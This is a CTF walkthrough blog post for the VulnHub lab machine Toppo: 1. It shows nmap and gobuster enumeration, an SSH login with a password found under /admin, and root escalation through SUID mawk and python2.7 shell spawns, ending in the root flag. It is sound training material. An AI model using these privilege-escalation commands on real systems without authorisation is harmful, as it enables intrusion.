CTF · Vulnhub

Toppo: 1

admin

Setup Vulhub Machine: –

  1. First, we have to download the zip file from VulnHub. (https://www.vulnhub.com/entry/toppo-1,245/)
  2. Extract the .zip file
  3. Open Virtual Box, and then click on new. Fill in the name, type, and version As this file is in form of  “.vmdk” format, so we need to create a new virtual machine. Where, Name: Toppo, Type: Linux, Version: Other Linux (64-bit)
  4. Click Next and customize the memory size and then browse the existing virtual disk file
  5. After completion, Check if the Network Adapter is set to Host-only adapter, or not.
  6. Once you are done with the settings up, let’s start the instance VMs.
  7. Now, the instance is ready and we have got a terminal screen that prompts us to input the password. 

The Walkthrough: – 

Step 1:- (Enumeration) 

 
find out the target IP address using NetDiscover

From the scanning, we have discovered our target IP address which is 192.168.111

Now, let’s perform a network scan to detect what ports are open. 

Note:- Scanning the Network is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks.

As in most cases we are going to use the famous Nmap tool.

  • -sC: Used to perform a script scan using the default set of scripts,
  • -sV: Enables version detection, which will detect what versions are running on what port.
┌──(rootharsh㉿kali)-[~]
└─$ sudo nmap -sC -sV 192.168.56.111
[sudo] password for rootharsh: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 17:13 IST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.111
Host is up (0.00013s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 ec61979f4dcb759959d4c1c4d43ed9dc (DSA)
|   2048 8999c4549a1866f7cd8eabb6aa312ec6 (RSA)
|   256 60bedd8f1ad7a3f3fe21cc2f11307b0d (ECDSA)
|_  256 39d97926603d6ca21e8b1971c0e25e5f (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Clean Blog - Start Bootstrap Theme
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          47974/udp   status
|   100024  1          50283/tcp   status
|   100024  1          55426/tcp6  status
|_  100024  1          58511/udp6  status
MAC Address: 08:00:27:C9:3E:02 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.11 seconds
                                                                                                      
┌──(rootharsh㉿kali)-[~]
└─$

From the Network scanning we have spotted three open ports.

  • Port 22/TCP running an SSH service, which means that if you have a valid credential then it will be easy to gain login access to the server.
  • Port 80/TCP running an HTTP service, which indicates that there is some vulnerable website being hosted.
  • And the last one is Port 111/TCP running an RPC bind service, which seems to be not useful in terms of gaining access to the server.

So let’s take a look at the web content running on Port 80. To look at the contents ourselves, we can open a web browser of our choice, and navigate to the target’s IP address in the URL bar at the top of the window.

The running website might be created using Bootstrap. After analyzing there is nothing to enumerate on the webpage. There might be any hidden or hardly accessible directories and pages and that can be done through directory Busting.

Using gobuster as our tool we can use the following switches for the script to get the fastest and most accurate results.

  • dir: Used to specify the mode of enumeration, 
  • -u:  Used to specify the target URL, and 
  • -w: Used to specify the path of the wordlist.
┌──(rootharsh㉿kali)-[~]
└─$ gobuster dir -u http://192.168.56.111/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.111/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/03/27 17:16:22 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 298]
/.htaccess            (Status: 403) [Size: 298]
/admin                (Status: 301) [Size: 316] [--> http://192.168.56.111/admin/]
/.hta                 (Status: 403) [Size: 293]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.111/css/]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.111/img/]
/index.html           (Status: 200) [Size: 6437]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.111/js/]
/LICENSE              (Status: 200) [Size: 1093]
/mail                 (Status: 301) [Size: 315] [--> http://192.168.56.111/mail/]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.111/manual/]
/server-status        (Status: 403) [Size: 302]
/vendor               (Status: 301) [Size: 317] [--> http://192.168.56.111/vendor/]
Progress: 4614 / 4615 (99.98%)
===============================================================
2023/03/27 17:16:27 Finished
===============================================================
                                                                                                      
┌──(rootharsh㉿kali)-[~]
└─$

As a result of Directory busting we obtained an admin page. Let’s dig into this directory and find out if there is any sensitive information that might help us in foothold. Let’s have a look.

Step 2:- (Foothold)

From the Admin Page, we obtain a Text file that contains a Password.

Let’s try to attempt login to gain access to the server with the help of the SSH client tool. 

To gain an SSH connection, we might have a username and password. From the note, we have obtained a password. If you have looked at it carefully then you have noticed a username is also mentioned within the Password. 

Let’s have a look.

Open a terminal and run the following command:

┌──(rootharsh㉿kali)-[~]
└─$ ssh ted@192.168.56.111
The authenticity of host '192.168.56.111 (192.168.56.111)' can't be established.
ED25519 key fingerprint is SHA256:vJgmhqKOmHq0Mb0plSTyOdzw6GenPEkZkch+PIVozzw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.111' (ED25519) to the list of known hosts.
ted@192.168.56.111's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 15 12:33:00 2018 from 192.168.0.29
ted@Toppo:~$

As you can notice we got login successfully, now move for post-exploitation and try to get root access.

Step 3:- (Privilege Escalation)

The next step is escalating to the root user in order to gain the highest privileges on the system. Let’s run “uname -a” to display the system the information which seems to be not vulnerable to this Debian version.

ted@Toppo:~$ uname -a
Linux Toppo 3.16.0-4-586 #1 Debian 3.16.51-3 (2017-12-13) i686 GNU/Linux
ted@Toppo:~$

Now, run the following command to enumerate all binaries having SUID permissions.

Note:- SUID or Set Owner User ID is special file permission for executable files, which enables other users to run the file with the effective permissions of the file owner

ted@Toppo:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount
ted@Toppo:~$

As you can see this command dumped all system binaries which having SUID permissions. (Marked in Red)

In order to gain root access. I have two methods.

Method 1: Using MAWK

Description:-

MAWK is an interpreter for the AWK Programming Language. The AWK language is useful for manipulating data files, text retrieval and processing, and prototyping and experimenting with algorithms.

By running the following command with mawk to get the root shell. You can find the root flag from the root directory to complete the challenge.

ted@Toppo:~$ mawk 'BEGIN {system("/bin/sh")}'
# cat /root/flag.txt 
___                                  
|  _   _  |                                 
|/ | | \|.--.   _ .--.   _ .--.    .--.   
    | |  / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \ 
   | | | \_. | | \/ | | \/ || \_. | 
  |__| '..'  | ;./  | ;./  '._.'  
                 [_|     [_|              




Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}



#

Method 2: Using Python 2.7

You just need to run these interactive shell commands to obtain the root shell.

ted@Toppo:~$ python2.7 -c "import pty;pty.spawn('/bin/sh')"
# whoami
root
# cd /root
# ls
flag.txt
# cat flag.txt
_________                                  
|  _   _  |                                 
|_/ | | \_|.--.   _ .--.   _ .--.    .--.   
    | |  / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \ 
   _| |_ | \__. | | \__/ | | \__/ || \__. | 
  |_____| '.__.'  | ;.__/  | ;.__/  '.__.'  
                 [__|     [__|              




Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}



#

Congratulation! On completion of the CTFchallenge.

Leave a Reply

Your email address will not be published. Required fields are marked *